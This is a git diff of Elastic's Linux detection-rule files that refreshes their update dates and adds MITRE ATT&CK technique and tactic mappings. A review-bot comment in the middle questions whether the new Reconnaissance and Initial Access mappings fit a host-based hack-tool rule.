a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index b094488daa9..5e3fa776b44 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -128,3 +133,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 42342789d2f..57187ffedd9 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,6 +135,11 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index fdf0986337e..01e048ff1de 100644 --- a/rules/linux/execution_perl_tty_shell.toml 
+++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -130,6 +130,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index c3d550b7b8b..267e8cb0ef4 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -133,3 +133,84 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.002" +name = "Password Cracking" +reference = "https://attack.mitre.org/techniques/T1110/002/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" 
+reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 69ded33a6ec..dd1099bb85a 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -139,7 +144,6 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index b89fc96dc27..dcfef99c872 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
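Review bot: The new Reconnaissance (TA0043) entry mapping T1595.002 and T1595.003 in execution_potential_hack_tool_executed.toml looks like a tactic stretch for a host-based rule: T1595 describes pre-compromise scanning of a victim from adversary-controlled infrastructure, while scanning that endpoint telemetry can observe is the same activity already covered by the T1046 Network Service Discovery entry this hunk adds. Together with the new Initial Access (T1190) entry the rule now carries six tactics, which changes how its alerts are grouped and triaged, so it is worth a second look at whether the rule's query actually evidences those pre-compromise tactics. If they are kept on purpose, a sentence in the PR description explaining why the mapping crosses into Reconnaissance would help the next reviewer.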
@@ -124,6 +124,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -132,6 +137,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" @@ -141,7 +156,6 @@ reference = "https://attack.mitre.org/techniques/T1564/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 9188badd565..6ea1de11b32 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,14 +88,36 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.008" +name = "Masquerade File Type" +reference = "https://attack.mitre.org/techniques/T1036/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 1f0801f42f1..bec9a7025f8 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -128,3 +128,16 @@ reference = "https://attack.mitre.org/techniques/T1059/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index c8eff177979..b6bdfa7b727 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,6 +117,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" diff --git a/rules/linux/execution_remote_code_execution_via_postgresql.toml b/rules/linux/execution_remote_code_execution_via_postgresql.toml index 1cecb668514..177c05598ab 100644 --- a/rules/linux/execution_remote_code_execution_via_postgresql.toml +++ b/rules/linux/execution_remote_code_execution_via_postgresql.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index a1fd996d20e..82295dbf93a 100644 
--- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -194,19 +194,31 @@ process where host.os.type == "linux" and event.type == "start" and process.exec [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml index b57a9c5ebbe..5d19d5276d6 100644 --- a/rules/linux/execution_shell_openssl_client_or_server.toml +++ b/rules/linux/execution_shell_openssl_client_or_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -136,6 +136,16 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1573"
+name = "Encrypted Channel"
+reference = "https://attack.mitre.org/techniques/T1573/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1573.002"
+name = "Asymmetric Cryptography"
+reference = "https://attack.mitre.org/techniques/T1573/002/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml
index 71f6934441f..665394590e0 100644
--- a/rules/linux/execution_shell_via_background_process.toml
+++ b/rules/linux/execution_shell_via_background_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/20"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,6 +129,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
index b1d6944dd41..86d6082bcbc 100644
--- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
+++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -131,6 +131,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
index 26b891475de..460eaa351cf 100644
--- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
+++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -131,6 +131,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -144,6 +149,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml
index 8e75039764d..4d45d18d00c 100644
--- a/rules/linux/execution_shell_via_meterpreter_linux.toml
+++ b/rules/linux/execution_shell_via_meterpreter_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/10"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -144,3 +144,31 @@ reference = "https://attack.mitre.org/techniques/T1071/"
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+[[rule.threat.technique]]
+id = "T1087"
+name = "Account Discovery"
+reference = "https://attack.mitre.org/techniques/T1087/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1087.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1087/001/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml
index ed5b8943ef7..5b6fc4511da 100644
--- a/rules/linux/execution_shell_via_suspicious_binary.toml
+++ b/rules/linux/execution_shell_via_suspicious_binary.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -139,6 +139,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
index c8be644cd99..600e8165d13 100644
--- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
+++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,6 +129,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
index 35f575a8b8e..4f6e3d3579b 100644
--- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
+++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -137,6 +137,16 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -150,6 +160,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
index 19461e6ab6b..b40f0b00185 100644
--- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
+++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -132,6 +132,11 @@ id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.015"
+name = "Compression"
+reference = "https://attack.mitre.org/techniques/T1027/015/"
+
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml
index 880ff976e63..6bdc18fb314 100644
--- a/rules/linux/execution_suspicious_executable_running_system_commands.toml
+++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -135,6 +135,43 @@ id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
+[[rule.threat.technique]]
+id = "T1049"
+name = "System Network Connections Discovery"
+reference = "https://attack.mitre.org/techniques/T1049/"
+
+[[rule.threat.technique]]
+id = "T1057"
+name = "Process Discovery"
+reference = "https://attack.mitre.org/techniques/T1057/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name"]
diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml
index 30a5f83b43b..a1e246c63e2 100644
--- a/rules/linux/execution_suspicious_mining_process_creation_events.toml
+++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/08"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -120,3 +120,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1496"
+name = "Resource Hijacking"
+reference = "https://attack.mitre.org/techniques/T1496/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1543.002"
+name = "Systemd Service"
+reference = "https://attack.mitre.org/techniques/T1543/002/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
index a35ae4ec714..6438bae79a2 100644
--- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
+++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/01"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/08"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -108,6 +108,11 @@ id = "T1609"
 name = "Container Administration Command"
 reference = "https://attack.mitre.org/techniques/T1609/"
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -116,6 +121,26 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [[rule.threat.technique]]
 id = "T1611"
 name = "Escape to Host"
@@ -129,6 +154,16 @@ reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
 [[rule.threat.technique]]
 id = "T1053"
 name = "Scheduled Task/Job"
@@ -144,6 +179,46 @@ id = "T1053.003"
 name = "Cron"
 reference = "https://attack.mitre.org/techniques/T1053/003/"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.004"
+name = "SSH Authorized Keys"
+reference = "https://attack.mitre.org/techniques/T1098/004/"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.004"
+name = "Unix Shell Configuration Modification"
+reference = "https://attack.mitre.org/techniques/T1546/004/"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.013"
+name = "XDG Autostart Entries"
+reference = "https://attack.mitre.org/techniques/T1547/013/"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml
index c9804ea2744..f288223ac7d 100644
--- a/rules/linux/execution_system_binary_file_permission_change.toml
+++ b/rules/linux/execution_system_binary_file_permission_change.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
